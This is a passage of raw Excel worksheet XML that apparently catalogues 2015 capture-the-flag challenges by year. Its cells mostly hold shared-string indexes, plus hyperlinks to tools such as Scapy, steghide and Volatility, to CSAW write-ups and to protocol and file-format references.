        <v>What is Brainloller</v>
      </c>
      <c r="I234" s="30" t="s">
        <v>3487</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B235" s="31">
        <v>2015.0</v>
      </c>
      <c r="C235" s="30" t="s">
        <v>3488</v>
      </c>
      <c r="D235" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E235" s="30" t="s">
        <v>2641</v>
      </c>
      <c r="F235" s="35" t="s">
        <v>3491</v>
      </c>
      <c r="G235" s="33" t="str">
        <f>HYPERLINK("https://github.com/philipl/pifs","PI-FS")</f>
        <v>PI-FS</v>
      </c>
      <c r="H235" s="30"/>
      <c r="I235" s="30"/>
    </row>
    <row r="236">
      <c r="A236" s="17">
        <v>42570.0</v>
      </c>
      <c r="B236" s="65"/>
      <c r="C236" s="65"/>
      <c r="D236" s="65"/>
      <c r="E236" s="9"/>
      <c r="F236" s="65"/>
      <c r="G236" s="65"/>
      <c r="H236" s="66"/>
      <c r="I236" s="9"/>
      <c r="J236" s="9"/>
      <c r="K236" s="9"/>
      <c r="L236" s="9"/>
      <c r="M236" s="9"/>
      <c r="N236" s="9"/>
      <c r="O236" s="9"/>
      <c r="P236" s="9"/>
      <c r="Q236" s="9"/>
      <c r="R236" s="9"/>
      <c r="S236" s="9"/>
      <c r="T236" s="9"/>
      <c r="U236" s="9"/>
      <c r="V236" s="9"/>
      <c r="W236" s="9"/>
      <c r="X236" s="9"/>
      <c r="Y236" s="9"/>
      <c r="Z236" s="9"/>
    </row>
    <row r="237">
      <c r="A237" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B237" s="31">
        <v>2015.0</v>
      </c>
      <c r="C237" s="30" t="s">
        <v>3500</v>
      </c>
      <c r="D237" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E237" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F237" s="35" t="s">
        <v>3501</v>
      </c>
      <c r="G237" s="30" t="s">
        <v>3502</v>
      </c>
      <c r="H237" s="33" t="str">
        <f>HYPERLINK("http://www.secdev.org/projects/scapy/","Scapy")</f>
        <v>Scapy</v>
      </c>
      <c r="I237" s="30"/>
      <c r="J237" s="30"/>
    </row>
    <row r="238">
      <c r="A238" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B238" s="31">
        <v>2015.0</v>
      </c>
      <c r="C238" s="30" t="s">
        <v>3504</v>
      </c>
      <c r="D238" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E238" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F238" s="35" t="s">
        <v>3505</v>
      </c>
      <c r="G238" s="30" t="s">
        <v>3506</v>
      </c>
      <c r="H238" s="33" t="str">
        <f>HYPERLINK("http://www.w3schools.com/jsref/prop_loc_hash.asp","Location Hash Property")</f>
        <v>Location Hash Property</v>
      </c>
      <c r="I238" s="33" t="str">
        <f>HYPERLINK("https://piwik.org/","Piwik Web Statistics")</f>
        <v>Piwik Web Statistics</v>
      </c>
      <c r="J238" s="30"/>
    </row>
    <row r="239">
      <c r="A239" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B239" s="31">
        <v>2015.0</v>
      </c>
      <c r="C239" s="30" t="s">
        <v>3509</v>
      </c>
      <c r="D239" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E239" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F239" s="35" t="s">
        <v>3510</v>
      </c>
      <c r="G239" s="30" t="s">
        <v>3511</v>
      </c>
      <c r="H239" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B240" s="31">
        <v>2015.0</v>
      </c>
      <c r="C240" s="30" t="s">
        <v>3512</v>
      </c>
      <c r="D240" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E240" s="30" t="s">
        <v>2641</v>
      </c>
      <c r="F240" s="35" t="s">
        <v>3513</v>
      </c>
      <c r="G240" s="30" t="s">
        <v>3514</v>
      </c>
      <c r="H240" s="30" t="s">
        <v>3515</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B241" s="31">
        <v>2015.0</v>
      </c>
      <c r="C241" s="30" t="s">
        <v>3517</v>
      </c>
      <c r="D241" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E241" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F241" s="35" t="s">
        <v>3519</v>
      </c>
      <c r="G241" s="30" t="s">
        <v>3521</v>
      </c>
      <c r="H241" s="30" t="s">
        <v>3522</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B242" s="31">
        <v>2015.0</v>
      </c>
      <c r="C242" s="30" t="s">
        <v>3523</v>
      </c>
      <c r="D242" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E242" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F242" s="35" t="s">
        <v>3524</v>
      </c>
      <c r="G242" s="30" t="s">
        <v>3525</v>
      </c>
      <c r="H242" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B243" s="31">
        <v>2015.0</v>
      </c>
      <c r="C243" s="30" t="s">
        <v>3526</v>
      </c>
      <c r="D243" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E243" s="30" t="s">
        <v>3527</v>
      </c>
      <c r="F243" s="35" t="s">
        <v>3528</v>
      </c>
      <c r="G243" s="30" t="s">
        <v>3529</v>
      </c>
      <c r="H243" s="30" t="s">
        <v>3530</v>
      </c>
      <c r="I243" s="30"/>
    </row>
    <row r="244">
      <c r="A244" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B244" s="31">
        <v>2015.0</v>
      </c>
      <c r="C244" s="30" t="s">
        <v>3531</v>
      </c>
      <c r="D244" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E244" s="30" t="s">
        <v>3532</v>
      </c>
      <c r="F244" s="35" t="s">
        <v>3533</v>
      </c>
      <c r="G244" s="30" t="s">
        <v>3534</v>
      </c>
      <c r="H244" s="30" t="s">
        <v>3535</v>
      </c>
      <c r="I244" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B245" s="31">
        <v>2015.0</v>
      </c>
      <c r="C245" s="30" t="s">
        <v>3538</v>
      </c>
      <c r="D245" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E245" s="30" t="s">
        <v>3540</v>
      </c>
      <c r="F245" s="35" t="s">
        <v>3542</v>
      </c>
      <c r="G245" s="30" t="s">
        <v>3544</v>
      </c>
      <c r="H245" s="33" t="str">
        <f>HYPERLINK("https://www.youtube.com/watch?v=68BjP5f0ccE","Nicolas Cage Teaches the Alphabbet")</f>
        <v>Nicolas Cage Teaches the Alphabbet</v>
      </c>
      <c r="I245" s="30"/>
    </row>
    <row r="246">
      <c r="A246" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B246" s="31">
        <v>2015.0</v>
      </c>
      <c r="C246" s="30" t="s">
        <v>2501</v>
      </c>
      <c r="D246" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E246" s="30" t="s">
        <v>3545</v>
      </c>
      <c r="F246" s="35" t="s">
        <v>3546</v>
      </c>
      <c r="G246" s="30" t="s">
        <v>3547</v>
      </c>
      <c r="H246" s="30" t="s">
        <v>3548</v>
      </c>
      <c r="I246" s="30"/>
      <c r="J246" s="30"/>
      <c r="K246" s="30"/>
    </row>
    <row r="247">
      <c r="A247" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B247" s="31">
        <v>2015.0</v>
      </c>
      <c r="C247" s="30" t="s">
        <v>3549</v>
      </c>
      <c r="D247" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E247" s="30" t="s">
        <v>3160</v>
      </c>
      <c r="F247" s="35" t="s">
        <v>3551</v>
      </c>
      <c r="G247" s="30" t="s">
        <v>3552</v>
      </c>
      <c r="H247" s="30" t="s">
        <v>2491</v>
      </c>
      <c r="I247" s="30"/>
      <c r="J247" s="30"/>
      <c r="K247" s="30"/>
    </row>
    <row r="248">
      <c r="A248" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B248" s="31">
        <v>2015.0</v>
      </c>
      <c r="C248" s="30" t="s">
        <v>3554</v>
      </c>
      <c r="D248" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E248" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F248" s="35" t="s">
        <v>3555</v>
      </c>
      <c r="G248" s="30" t="s">
        <v>3620</v>
      </c>
      <c r="H248" s="30" t="s">
        <v>446</v>
      </c>
      <c r="I248" s="30"/>
      <c r="J248" s="30"/>
      <c r="K248" s="30"/>
    </row>
    <row r="249">
      <c r="A249" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B249" s="31">
        <v>2015.0</v>
      </c>
      <c r="C249" s="30" t="s">
        <v>3626</v>
      </c>
      <c r="D249" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E249" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F249" s="35" t="s">
        <v>3630</v>
      </c>
      <c r="G249" s="30" t="s">
        <v>3632</v>
      </c>
      <c r="H249" s="33" t="str">
        <f>HYPERLINK("https://github.com/reyammer/csawctf-quals-2015-pcapin/blob/master/decrypt.py"," decrypt script")</f>
        <v> decrypt script</v>
      </c>
      <c r="I249" s="30"/>
      <c r="J249" s="30"/>
      <c r="K249" s="30"/>
    </row>
    <row r="250">
      <c r="A250" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B250" s="31">
        <v>2015.0</v>
      </c>
      <c r="C250" s="30" t="s">
        <v>1447</v>
      </c>
      <c r="D250" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E250" s="30" t="s">
        <v>3633</v>
      </c>
      <c r="F250" s="35" t="s">
        <v>3634</v>
      </c>
      <c r="G250" s="30" t="s">
        <v>3635</v>
      </c>
      <c r="H250" s="33" t="str">
        <f>HYPERLINK("https://www.tineye.com/","TinEye")</f>
        <v>TinEye</v>
      </c>
      <c r="I250" s="33" t="str">
        <f>HYPERLINK("http://steghide.sourceforge.net/","steghide")</f>
        <v>steghide</v>
      </c>
      <c r="J250" s="30"/>
      <c r="K250" s="30"/>
    </row>
    <row r="251">
      <c r="A251" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B251" s="31">
        <v>2015.0</v>
      </c>
      <c r="C251" s="30" t="s">
        <v>3640</v>
      </c>
      <c r="D251" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E251" s="30" t="s">
        <v>3641</v>
      </c>
      <c r="F251" s="35" t="s">
        <v>3642</v>
      </c>
      <c r="G251" s="30" t="s">
        <v>3643</v>
      </c>
      <c r="H251" s="30" t="s">
        <v>3644</v>
      </c>
      <c r="I251" s="30"/>
      <c r="J251" s="30"/>
      <c r="K251" s="30"/>
    </row>
    <row r="252">
      <c r="A252" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B252" s="31">
        <v>2015.0</v>
      </c>
      <c r="C252" s="30" t="s">
        <v>3645</v>
      </c>
      <c r="D252" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E252" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F252" s="35" t="s">
        <v>479</v>
      </c>
      <c r="G252" s="30" t="s">
        <v>3646</v>
      </c>
      <c r="H252" s="30"/>
      <c r="I252" s="30"/>
      <c r="J252" s="30"/>
    </row>
    <row r="253">
      <c r="A253" s="34" t="s">
        <v>1265</v>
      </c>
      <c r="B253" s="134">
        <v>2015.0</v>
      </c>
      <c r="C253" s="34" t="s">
        <v>3648</v>
      </c>
      <c r="D253" s="34" t="s">
        <v>48</v>
      </c>
      <c r="E253" s="34" t="s">
        <v>3650</v>
      </c>
      <c r="F253" s="32" t="s">
        <v>479</v>
      </c>
      <c r="G253" s="34" t="s">
        <v>3652</v>
      </c>
      <c r="H253" s="135" t="str">
        <f t="shared" ref="H253:H254" si="1">HYPERLINK("http://fadec0d3.blogspot.com/2015/09/csaw-2015-recon-trivia.html","writeup")</f>
        <v>writeup</v>
      </c>
      <c r="I253" s="34"/>
      <c r="J253" s="34"/>
      <c r="K253" s="105"/>
      <c r="L253" s="105"/>
      <c r="M253" s="105"/>
      <c r="N253" s="105"/>
      <c r="O253" s="105"/>
      <c r="P253" s="105"/>
      <c r="Q253" s="105"/>
      <c r="R253" s="105"/>
      <c r="S253" s="105"/>
      <c r="T253" s="105"/>
      <c r="U253" s="105"/>
      <c r="V253" s="105"/>
      <c r="W253" s="105"/>
      <c r="X253" s="105"/>
      <c r="Y253" s="105"/>
      <c r="Z253" s="105"/>
    </row>
    <row r="254">
      <c r="A254" s="34" t="s">
        <v>1265</v>
      </c>
      <c r="B254" s="134">
        <v>2015.0</v>
      </c>
      <c r="C254" s="34" t="s">
        <v>3658</v>
      </c>
      <c r="D254" s="34" t="s">
        <v>48</v>
      </c>
      <c r="E254" s="34" t="s">
        <v>3650</v>
      </c>
      <c r="F254" s="32" t="s">
        <v>479</v>
      </c>
      <c r="G254" s="34" t="s">
        <v>3652</v>
      </c>
      <c r="H254" s="135" t="str">
        <f t="shared" si="1"/>
        <v>writeup</v>
      </c>
      <c r="I254" s="34"/>
      <c r="J254" s="34"/>
      <c r="K254" s="105"/>
      <c r="L254" s="105"/>
      <c r="M254" s="105"/>
      <c r="N254" s="105"/>
      <c r="O254" s="105"/>
      <c r="P254" s="105"/>
      <c r="Q254" s="105"/>
      <c r="R254" s="105"/>
      <c r="S254" s="105"/>
      <c r="T254" s="105"/>
      <c r="U254" s="105"/>
      <c r="V254" s="105"/>
      <c r="W254" s="105"/>
      <c r="X254" s="105"/>
      <c r="Y254" s="105"/>
      <c r="Z254" s="105"/>
    </row>
    <row r="255">
      <c r="A255" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B255" s="31">
        <v>2015.0</v>
      </c>
      <c r="C255" s="30" t="s">
        <v>3664</v>
      </c>
      <c r="D255" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E255" s="30" t="s">
        <v>2232</v>
      </c>
      <c r="F255" s="35" t="s">
        <v>3665</v>
      </c>
      <c r="G255" s="30" t="s">
        <v>3666</v>
      </c>
      <c r="H255" s="33" t="str">
        <f>HYPERLINK("http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/PDF32000_2008.pdf","Official PDF Specification")</f>
        <v>Official PDF Specification</v>
      </c>
      <c r="I255" s="30" t="s">
        <v>3673</v>
      </c>
      <c r="J255" s="33" t="str">
        <f>HYPERLINK("https://asecuritysite.com/scalpel.conf.txt","scalpel.conf")</f>
        <v>scalpel.conf</v>
      </c>
      <c r="K255" s="33" t="str">
        <f>HYPERLINK("http://www.myportablesoftware.com/freefilecamouflage.aspx","Free file camouflage")</f>
        <v>Free file camouflage</v>
      </c>
      <c r="L255" s="30"/>
    </row>
    <row r="256">
      <c r="A256" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B256" s="31">
        <v>2015.0</v>
      </c>
      <c r="C256" s="30" t="s">
        <v>3678</v>
      </c>
      <c r="D256" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E256" s="30" t="s">
        <v>3160</v>
      </c>
      <c r="F256" s="30" t="s">
        <v>3683</v>
      </c>
      <c r="G256" s="173" t="str">
        <f>HYPERLINK("http://blog.nviso.be/2015/04/cyber-security-challenge-belgium-2015_15.html","Good Writeup")</f>
        <v>Good Writeup</v>
      </c>
      <c r="H256" s="30"/>
    </row>
    <row r="257">
      <c r="A257" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B257" s="31">
        <v>2015.0</v>
      </c>
      <c r="C257" s="30" t="s">
        <v>3705</v>
      </c>
      <c r="D257" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E257" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F257" s="30" t="s">
        <v>3707</v>
      </c>
      <c r="G257" s="30" t="s">
        <v>3708</v>
      </c>
      <c r="H257" s="30"/>
    </row>
    <row r="258">
      <c r="A258" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B258" s="31">
        <v>2015.0</v>
      </c>
      <c r="C258" s="30" t="s">
        <v>3709</v>
      </c>
      <c r="D258" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E258" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F258" s="30" t="s">
        <v>3710</v>
      </c>
      <c r="G258" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="H258" s="30"/>
    </row>
    <row r="259">
      <c r="A259" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B259" s="31">
        <v>2015.0</v>
      </c>
      <c r="C259" s="30" t="s">
        <v>3711</v>
      </c>
      <c r="D259" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E259" s="30" t="s">
        <v>3712</v>
      </c>
      <c r="F259" s="30" t="s">
        <v>3714</v>
      </c>
      <c r="G259" s="33" t="str">
        <f>HYPERLINK("https://github.com/volatilityfoundation/volatility","Volatility Memory Analyzer")</f>
        <v>Volatility Memory Analyzer</v>
      </c>
      <c r="H259" s="30"/>
    </row>
    <row r="260">
      <c r="A260" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B260" s="31">
        <v>2015.0</v>
      </c>
      <c r="C260" s="30" t="s">
        <v>3721</v>
      </c>
      <c r="D260" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E260" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F260" s="30" t="s">
        <v>3724</v>
      </c>
      <c r="G260" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="H260" s="30"/>
    </row>
    <row r="261">
      <c r="A261" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B261" s="115">
        <v>2015.0</v>
      </c>
      <c r="C261" s="113" t="s">
        <v>3728</v>
      </c>
      <c r="D261" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E261" s="113" t="s">
        <v>3160</v>
      </c>
      <c r="F261" s="113" t="s">
        <v>3732</v>
      </c>
      <c r="G261" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/File_Transfer_Protocol#Simple_File_Transfer_Protocol","SFTP Protocol")</f>
        <v>SFTP Protocol</v>
      </c>
      <c r="H261" s="163" t="str">
        <f>HYPERLINK("https://tools.ietf.org/html/rfc913","SFTP Memo")</f>
        <v>SFTP Memo</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B262" s="43">
        <v>2015.0</v>
      </c>
      <c r="C262" s="5" t="s">
        <v>3754</v>
      </c>
      <c r="D262" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E262" s="5" t="s">
        <v>2232</v>
      </c>
      <c r="F262" s="5" t="s">
        <v>3757</v>
      </c>
      <c r="G262" s="5" t="s">
        <v>3759</v>
      </c>
      <c r="H262" s="56" t="s">
        <v>3761</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B263" s="43">
        <v>2015.0</v>
      </c>
      <c r="C263" s="5" t="s">
        <v>3767</v>
      </c>
      <c r="D263" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E263" s="5" t="s">
        <v>3527</v>
      </c>
      <c r="F263" s="5" t="s">
        <v>3768</v>
      </c>
      <c r="G263" s="5" t="s">
        <v>3769</v>
      </c>
      <c r="H263" s="56" t="s">
        <v>3770</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B264" s="43">
        <v>2015.0</v>
      </c>
      <c r="C264" s="5" t="s">
        <v>3772</v>
      </c>
      <c r="D264" s="3"/>
      <c r="E264" s="5" t="s">
        <v>3773</v>
      </c>
      <c r="F264" s="5" t="s">
        <v>3774</v>
      </c>
      <c r="G264" s="5" t="s">
        <v>3775</v>
      </c>
      <c r="H264" s="5" t="s">
        <v>3779</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B265" s="43">
        <v>2015.0</v>
      </c>
      <c r="C265" s="5" t="s">
        <v>3782</v>
      </c>
      <c r="D265" s="5" t="s">
        <v>3783</v>
      </c>
      <c r="E265" s="5" t="s">
        <v>2290</v>
      </c>
      <c r="F265" s="5" t="s">
        <v>3784</v>
      </c>
      <c r="G265" s="5" t="s">
        <v>3786</v>
      </c>
      <c r="H265" s="3"/>
    </row>
    <row r="266">
      <c r="A266" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B266" s="43">
        <v>2015.0</v>
      </c>
      <c r="C266" s="5" t="s">
        <v>3789</v>
      </c>
      <c r="D266" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E266" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F266" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G266" s="5" t="s">
        <v>3792</v>
      </c>
      <c r="H266" s="56" t="s">
        <v>3794</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B267" s="43">
        <v>2015.0</v>
      </c>
      <c r="C267" s="5" t="s">
        <v>3803</v>
      </c>
      <c r="D267" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E267" s="5" t="s">
        <v>63</v>
      </c>
      <c r="F267" s="5" t="s">
        <v>3807</v>
      </c>
      <c r="G267" s="5" t="s">
        <v>3809</v>
      </c>
      <c r="H267" s="56" t="s">
        <v>3810</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B268" s="43">
        <v>2015.0</v>
      </c>
      <c r="C268" s="5" t="s">
        <v>3824</v>
      </c>
      <c r="D268" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E268" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F268" s="5" t="s">
        <v>3825</v>
      </c>
      <c r="G268" s="5" t="s">
        <v>3826</v>
      </c>
      <c r="H268" s="56" t="s">
        <v>3827</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B269" s="43">
        <v>2015.0</v>
      </c>
      <c r="C269" s="5" t="s">
        <v>3830</v>
      </c>
      <c r="D269" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E269" s="5" t="s">
        <v>2290</v>
      </c>
      <c r="F269" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G269" s="5" t="s">
        <v>3833</v>
      </c>
      <c r="H269" s="5" t="s">
        <v>3835</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B270" s="43">
        <v>2015.0</v>
      </c>
      <c r="C270" s="5" t="s">
        <v>479</v>
      </c>
      <c r="D270" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E270" s="5" t="s">
        <v>3839</v>
      </c>
      <c r="F270" s="5" t="s">
        <v>3807</v>
      </c>
      <c r="G270" s="5" t="s">
        <v>3843</v>
      </c>
      <c r="H270" s="3"/>
    </row>
    <row r="271">
      <c r="A271" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B271" s="43">
        <v>2015.0</v>
      </c>
      <c r="C271" s="5" t="s">
        <v>3845</v>
      </c>
      <c r="D271" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E271" s="5" t="s">
        <v>2290</v>
      </c>
      <c r="F271" s="5" t="s">
        <v>1328</v>
      </c>
      <c r="G271" s="5" t="s">
        <v>3847</v>
      </c>
      <c r="H271" s="5" t="s">
        <v>3848</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B272" s="43">
        <v>2015.0</v>
      </c>
      <c r="C272" s="5" t="s">
        <v>3849</v>
      </c>
      <c r="D272" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E272" s="5" t="s">
        <v>3850</v>
      </c>
      <c r="F272" s="5" t="s">
        <v>3851</v>
      </c>
      <c r="G272" s="5" t="s">
        <v>3852</v>
      </c>
      <c r="H272" s="56" t="s">
        <v>3853</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B273" s="43">
        <v>2015.0</v>
      </c>
      <c r="C273" s="5" t="s">
        <v>3855</v>
      </c>
      <c r="D273" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E273" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F273" s="5" t="s">
        <v>3807</v>
      </c>
      <c r="G273" s="5" t="s">
        <v>3856</v>
      </c>
      <c r="H273" s="5" t="s">
        <v>3857</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B274" s="43">
        <v>2015.0</v>
      </c>
      <c r="C274" s="5" t="s">
        <v>3858</v>
      </c>
      <c r="D274" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E274" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F274" s="5" t="s">
        <v>3859</v>
      </c>
      <c r="G274" s="5" t="s">
        <v>3860</v>
      </c>
      <c r="H274" s="3"/>
    </row>
    <row r="275">
      <c r="A275" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B275" s="31">
        <v>2015.0</v>
      </c>
      <c r="C275" s="30" t="s">
        <v>3861</v>
      </c>
      <c r="D275" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E275" s="30" t="s">
        <v>2663</v>
      </c>
      <c r="F275" s="30"/>
      <c r="G275" s="30" t="s">
        <v>3862</v>
      </c>
      <c r="H275" s="30"/>
      <c r="I275" s="30"/>
    </row>
    <row r="276">
      <c r="A276" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B276" s="31">
        <v>2015.0</v>
      </c>
      <c r="C276" s="30" t="s">
        <v>3863</v>
      </c>
      <c r="D276" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E276" s="30"/>
      <c r="F276" s="30" t="s">
        <v>3864</v>
      </c>
      <c r="G276" s="30" t="s">
        <v>3866</v>
      </c>
      <c r="H276" s="30"/>
      <c r="I276" s="30"/>
    </row>
    <row r="277">
      <c r="A277" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B277" s="31">
        <v>2015.0</v>
      </c>
      <c r="C277" s="30" t="s">
        <v>3867</v>
      </c>
      <c r="D277" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E277" s="30"/>
      <c r="F277" s="30" t="s">
        <v>3868</v>
      </c>
      <c r="G277" s="30" t="s">
        <v>3869</v>
      </c>
      <c r="H277" s="30"/>
      <c r="I277" s="30"/>
    </row>
    <row r="278">
      <c r="A278" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B278" s="31">
        <v>2015.0</v>
      </c>
      <c r="C278" s="30" t="s">
        <v>2140</v>
      </c>
      <c r="D278" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E278" s="30" t="s">
        <v>2370</v>
      </c>
      <c r="F278" s="30" t="s">
        <v>3870</v>
      </c>
      <c r="G278" s="30" t="s">
        <v>3871</v>
      </c>
      <c r="H278" s="30"/>
      <c r="I278" s="30"/>
    </row>
    <row r="279">
      <c r="A279" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B279" s="31">
        <v>2015.0</v>
      </c>
      <c r="C279" s="30" t="s">
        <v>3872</v>
      </c>
      <c r="D279" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E279" s="30" t="s">
        <v>2370</v>
      </c>
      <c r="F279" s="30" t="s">
        <v>3873</v>
      </c>
      <c r="G279" s="30" t="s">
        <v>3874</v>
      </c>
      <c r="H279" s="30" t="s">
        <v>2605</v>
      </c>
      <c r="I279" s="30"/>
    </row>
    <row r="280">
      <c r="A280" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B280" s="31">
        <v>2015.0</v>
      </c>
      <c r="C280" s="30" t="s">
        <v>3875</v>
      </c>
      <c r="D280" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E280" s="30" t="s">
        <v>2370</v>
      </c>
      <c r="F280" s="30" t="s">
        <v>3876</v>
      </c>
      <c r="G280" s="30" t="s">
        <v>3877</v>
      </c>
      <c r="H280" s="30" t="s">
        <v>2605</v>
      </c>
      <c r="I280" s="30"/>
    </row>
    <row r="281">
      <c r="A281" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B281" s="31">
        <v>2015.0</v>
      </c>
      <c r="C281" s="30" t="s">
        <v>3878</v>
      </c>
      <c r="D281" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E281" s="30"/>
      <c r="F281" s="30" t="s">
        <v>3879</v>
      </c>
      <c r="G281" s="30" t="s">
        <v>3880</v>
      </c>
      <c r="H281" s="30"/>
      <c r="I281" s="30"/>
    </row>
    <row r="282">
      <c r="A282" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B282" s="31">
        <v>2015.0</v>
      </c>
      <c r="C282" s="30" t="s">
        <v>3881</v>
      </c>
      <c r="D282" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E282" s="30" t="s">
        <v>3271</v>
      </c>
      <c r="F282" s="30" t="s">
        <v>3882</v>
      </c>
      <c r="G282" s="30" t="s">
        <v>3883</v>
      </c>
      <c r="H282" s="181" t="s">
        <v>3884</v>
      </c>
      <c r="I282" s="30"/>
    </row>
    <row r="283">
      <c r="A283" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B283" s="31">
        <v>2015.0</v>
      </c>
      <c r="C283" s="30" t="s">
        <v>3895</v>
      </c>
      <c r="D283" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E283" s="30"/>
      <c r="F283" s="30" t="s">
        <v>2676</v>
      </c>
      <c r="G283" s="30" t="s">
